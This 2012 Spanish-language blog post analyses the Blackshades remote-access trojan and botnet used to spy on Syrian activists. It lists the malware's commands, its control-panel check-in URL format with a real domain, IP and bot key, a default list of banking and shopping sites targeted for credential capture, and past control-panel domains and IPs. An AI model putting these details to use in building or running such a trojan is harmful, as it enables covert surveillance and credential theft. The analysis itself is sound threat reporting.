lunes, 30 de julio de 2012

Blackshades botnet y el nuevo espionaje de guerra


Cada vez viene siendo más habitual que se empiece a utilizar las capacidades de las redes botnets para emplearlas como armas de espionaje o ciberguerra como ha ocurrido con el gusano Stuxnet .

La última amenaza de este tipo ha sido el descubrimiento por parte de investigadores de Electronic Frontier Foundation (EFF)  “Descubierto un nuevo ataque de propagación malware contra los activistas sirios utilizando el Troyano Blackshades.”

En esta ocasión había sido modificado el troyano Blackshades para grabar las conversaciones de audio que eran capturadas por el micrófono de voz del equipo infectado sin que la victima tuviera conocimiento de este hecho. Aparte de esto el troyano también tiene capacidad para capturar imágenes desde la cámara webcam del usuario.


En los últimos episodios bélicos actuales se ha puesto de manifiesto el empleo masivo de Internet como arma de Ciberguerra, tanto para sabotear los sistemas del enemigo, como también como medio de comunicación entre las fuerzas militares y por supuesto para el robo de información y espionaje del enemigo.
En esta ocasión se ha empleado el botkit del troyano BLACKSHADE para interceptar las comunicaciones de los activistas Sirios. Teniendo en cuanta el control total de las Telecomunicaciones en el País y que muchos de los activistas provienen de países extranjeros Internet es un medio de comunicación imprescindible para comunicarse con sus familiares lejanos y coordinarse en las operaciones tácticas de combate.
Así pues infectar un solo equipo por el troyano es un activo muy valioso para identificar a los activistas y sus acciones con los datos capturados por el troyano, puesto que debido a la escases de conexiones a Internet en el país, cada equipo es usado por multitud de usuarios  consiguiendo un impacto muy alto en la recopilación de información sobre la actuación y los movimientos de los activistas
Blackshade en realidad se trata de una herramienta RAT de control remoto de los equipos infectados con un abanico bastante amplio de comandos que se pueden lanzar contra los equipos comprometidos o zombies.


En este articulo se va a profundizar en el conocimiento troyano Blackshade y su comportamiento:

La estructura del kit del botnet blackshades es la siguiente:

Una vez iniciada la infección del equipo comprometido , el troyano se comunicará con el Panel de Control de la red Botnet mediante la siguiente cadena de conexión:

hXXp://HOST_PANEL_CONTROL/alive.php?key=CLAVE&pcuser=XXX&pcname=XXXX&hwid=XXX&country=XXXX

Cada red botnet utiliza una contraseña para identificar los equipos zombies pertenecientes a su red y así también evitar que sus zombies sean secuestrados por otro Panel de Control.

Ejemplo de una cadena de conexión autentica de un panel BlackShade que ya se encuentra inactivo:

hXXp://yosoyhumilde.com/movil/alive.php?key=vodafone&pcuser=UserName&pcname=COMPUTERNAME&hwid=434F4D50&country=United+States

En esta ocasión el panel de Control estaba alojado en el dominio yosoyhumilde.com con IP 190.196.69.213 alojada en Chile.
Y la contraseña que identificaba a todos sus bots era “Vodafone”

La pantalla de acceso al panel de control de la red botnets del Blackshade muestra la siguiente imagen:

 El panel de control en el dominio hxxp://laidojimopaslaugos.com se encuentra activo en el momento de realizar este informe. Las palabras “laidojimo paslaugos” significan “servicios funerarios” en Lituano.


Una vez que se accede al mismo se muestra una pantalla con los datos estadísticos de los equipos infectados hasta el momento:

El panel de Administración de la red de botnets dispone de varias opciones en su menú de control. Entre estas opciones esta la posibilidad de lanzar comandos en los equipos infectados tal como se observa en la captura:
Tiene una gran variedad de comandos que permiten tener casi un control total en la máquina comprometida. Estos comandos son los siguientes:

Keylog - Busca una palabra clave en un texto dado.
Passwords  - captura las contraseñas de las máquinas zombies.
Screen capture - Recolecta las capturas de pantalla de los equipos zombies.
Webcam capture  - Recolecta las capturas de webcam de los equipos zombies.
BotKiller - Elimina otras versiones de malware de la máquina infectada.
Spreader - Add contact (MSN) - Añade un contacto.
Spreader - Mass message (MSN)  - Envía un mensaje a todos los contactos que tenga en el MSN la máquina zombie.
Spreader - Torrent Seed -  Descarga e inicia la propagación a través del torrent a partir de una URL dada.
Spreader - Facebook- Publica un mensaje en el muro de facebook de las usuarios infectados.
Download and execute - Descarga un archivo en el equipo infectado y lo ejecuta.
Email grabber - Captura los correos electrónicos encontrados y los guarda en los logs.
Update - descarga el archivo indicado, entonces lo ejecuta y remueve el bot actual.
Uninstall - Elimina el bot completo.

Las imágenes capturadas desde la webcam se almacenan en el directorio hXXp://HOST_PANEL_CONTROL/WEBCAM/ sin que el usuario pueda percibir que se le está grabando desde la webcam tal como se observan en las capturas siguientes:

Las contraseñas capturadas con la opción keylog del troyano se pueden visualizar en el menú passwords:
Así como el listado de logs de las victimas almacenadas en el Panel de Control.
Se puede orientar la captura de logs a través de una lista de URL’s dada en la que se tenga interés de capturar los datos introducidos por los usuarios infectados en dichos sitios.

Esta lista se configura a través de la URL:

hXXp://HOST_PANEL_CONTROL/FG.php?Key=clave

El listado de las URLS y dominios que están configurados por defecto para que el troyano capture los datos confidenciales de los usuarios cuando acceden a ellos son las siguientes:

La mayoría de los sitios en la que han puesto sus ojos los criminales pertenecen a sitios de almacenamiento de ficheros y de compras por Internet así como redes sociales.

PayPal:http://paypal.com
Payment Gateway:http://authorize.net
Plimus:http://plimus.com
Amazon:http://amazon.com
Newegg:http://newegg.com
AlertPay:http://alertpay.com
WebMoney:http://wmtransfer.com
Moneybookers:http://moneybookers.com/app
Liberty Reserve:http://libertyreserve.com
ePassporte:http://epassporte.com
Google Checkout:http://checkout.google.com
Best Buy:http://bestbuy.com
Escrow:http://escrow.com
LastPass:http://lastpass.com
RoboForm:http://roboform.com
Xmarks:http://xmarks.com
ADrive:http://adrive.com
IBackup:http://ibackup.com
Myspace:http://myspace.com
Facebook:http://facebook.com
Lockerz:http://lockerz.com
TheVault:http://thevault.bz
Online Internet Marketing:http://forums.digitalpoint.com
WarriorForum:http://warriorforum.com
Black Hat SEO Forum:http://blackhatworld.com
RapidShare:http://rapidshare.com
MEGAUPLOAD:http://megaupload.com
MEGAVIDEO:http://megavideo.com
Hotfile:http://hotfile.com
FileServe:http://fileserve.com
Deposit Files:http://depositfiles.com
FileSonic:http://filesonic.com
ul.to:http://uploaded.to
FileFactory:http://filefactory.com
Unlimited free file storage:http://megashare.com
RuneScape:http://runescape.com
World of Warcraft:http://us.battle.net
EA Video Games:http://ea.com
Bank of America:http://bankofamerica.com
TCF Bank:http://tcfbank.com
Harris Bank:http://harrisbank.com
PNC Bank:http://pnc.com
CHASE Home:http://chase.com
Fifth Third Bank:http://53.com
Citibank:http://citibank.com
Target:http://target.com
Walmart.com:http://walmart.com
Consoles | GameStop:http://gamestop.com
FilePlanet:http://fileplanet.com
League of Legends LoL:http://leagueoflegends.com
Gunbound:http://gunbound.com
AT&T:http://att.com
T-Mobile:http://t-mobile.com
Go Daddy:http://godaddy.com
NameCheap:http://namecheap.com
Network Solutions:http://networksolutions.com
Verizon:http://verizon.com
U.S. Cellular:http://uscellular.com
GameFly:http://gamefly.com
Netflix:http://netflix.com
craigslist:http://craigslist.org
Xanga:http://xanga.com
PlayStation:http://playstation.com
IMVU:http://imvu.com
Direct2Drive:http://direct2drive.com
ILoveI:http://iloveim.com
deviantART:http://deviantart.com
Warez-BB:http://warez-bb.org
Hack Forums:http://hackforums.net
SitePoint:http://sitepoint.com
Western Union:http://westernunion.com

También dispone de un modulo para realizar ataques de denegación de servicio distribuido DDoS empleando las máquinas zombis como vectores de ataque.






 Hay una gran difusión de paneles del blackshade que se han empleado en el pasado. Actualmente muy pocos se encuentran operativos como se puede observar en la lista de dominios siguientes donde tenían instalado el Panel de Control:

hXXp://botziabotnet.com/bs/   Se encontraba alojado en la IP 64.79.111.142
hXXp://exal.me/      Se encontraba alojado en la IP  78.138.99.153
hXXp://reverse-shop.net/
hXXp://tonkraw.com/     Se encontraba alojado en la IP   119.59.120.5
hXXp://albanenergy.com/bots/    Se encontraba alojado en la IP 173.192.221.44
hXXp://hwf.dk/    Se encontraba alojado en la IP   46.30.211.60
hXXp://www.hackingftw.com/BS/    Se encontraba alojado en la IP  95.211.150.135
hXXp://habxl.com/
hXXp://laidojimopaslaugos.com/     Se encontraba alojado en la IP  83.125.22.169
hXXp://yosoyhumilde.com/movil/    Se encontraba alojado en la IP  190.196.69.213
hXXp://damejopo.com/fbs/       Se encontraba alojado en la IP  199.115.229.186



No hay comentarios:

Publicar un comentario en la entrada

Nota: solo los miembros de este blog pueden publicar comentarios.